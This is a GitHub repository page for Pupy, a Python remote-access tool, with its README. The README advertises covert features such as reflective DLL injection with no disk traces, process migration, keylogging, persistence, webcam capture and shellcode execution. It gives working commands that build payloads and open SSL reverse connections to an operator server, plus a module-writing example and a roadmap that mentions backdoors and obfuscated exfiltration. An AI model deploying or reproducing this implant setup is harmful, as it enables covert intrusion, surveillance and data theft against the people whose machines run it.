2ebf54d124
this should remove dependency on pywin32. cobbled together from screenshot.py and mouselogger from prior PR. still no controll module. |
||
|---|---|---|
| client | ||
| docs/screenshots | ||
| pupy | ||
| .gitignore | ||
| LICENSE | ||
| README.md | ||
README.md
Pupy
Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.
Features :
- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
- Pupy can reflectively migrate into other processes
- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
- modules are quite simple to write and pupy is easily extensible.
- Pupy uses rpyc and a module can directly access python objects on the remote client
- we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
- all the non interactive modules can be dispatched on multiple hosts in one command
- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
- modules can be executed as background jobs
- commands and scripts running on remote hosts are interruptible
- auto-completion and nice colored output :-)
- commands aliases can be defined in the config
Implemented Modules :
- migrate
- inter process architecture injection also works (x86->x64 and x64->x86)
- keylogger
- persistence
- screenshot
- webcam snapshot
- in memory execution of PE exe both x86 and x64 :)
- command execution
- download
- upload
- socks5 proxy
- local port forwarding
- interactive shell (cmd.exe, /bin/sh, ...)
- interactive python shell
- shellcode exec (thanks to @byt3bl33d3r)
##Quick start ###Installation :
pip install rpyc
pip install pefile
####Troubleshooting: If you have some issues with rpyc while running the server on windows, take a look at issue #25, @deathfantasy made a fix
Generate/run a payload
In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)
for Windows
./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.
for Linux
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
you can also build a single binary with pyinstaller :
pyinstaller --onefile /full_path/pupy/client/reverse_ssl.py
for MAC OS X
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
you can also build a single binary with pyinstaller (but you can't "cross-compile", pyinstaller currently only support this from osx):
pyinstaller --onefile /full_path/pupy/client/reverse_ssl.py
start the server
- eventually edit pupy.conf to change the bind address / port
- start the pupy server :
./pupysh.py
Some screenshots
#####list connected clients
#####help
#####execute python code on all clients
#####execute a command on all clients, exception is retrieved in case the command does not exists
#####use a filter to send a module only on selected clients
#####migrate into another process
#####interactive shell
#####interactive python shell
#####upload and run another PE exe from memory
#####list available modules (the list is not up to date)
##Example: How to write a MsgBox module
first of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py
import ctypes
import threading
def MessageBox(text, title):
t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
t.daemon=True
t.start()
then, simply create a module to load our package and call the function remotely
class MsgBoxPopup(PupyModule):
""" Pop up a custom message box """
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
self.arg_parser.add_argument('--title', help='msgbox title')
self.arg_parser.add_argument('text', help='text to print in the msgbox :)')
@windows_only
def is_compatible(self):
pass
def run(self, args):
self.client.load_package("pupwinutils.msgbox")
self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
self.log("message box popped !")
and that's it, we have a fully functional module :)
>> run msgbox -h
usage: msgbox [-h] [--title TITLE] text
Pop up a custom message box
positional arguments:
text text to print in the msgbox :)
optional arguments:
-h, --help show this help message and exit
--title TITLE msgbox title
Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)
pefile
##Roadmap and ideas Some ideas without any priority order
- support for https proxy
- bind instead of reverse connection
- add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
- integrate scapy in the windows dll :D (that would be fun)
- work on stealthiness and modules under unix systems
- mic recording
- socks5 udp support
- remote port forwarding
- perhaps write some documentation
- The backdoor factory ?
- Impacket ?
- exfiltration through obfsproxy obfuscated network stream ?
- ...
- any cool idea ?
FAQ
Does the server works on windows ?
Yes but it has not really been tested and it may be unstable
I can't install it how does it work ?
pip install rpyc
hey c4n y0u add a DDOS module plzz?
No.
Contact
by mail: contact@n1nj4.eu
on Twitter: Follow me on twitter
If some of you want to participate or send me a feedback, don't hesitate :-)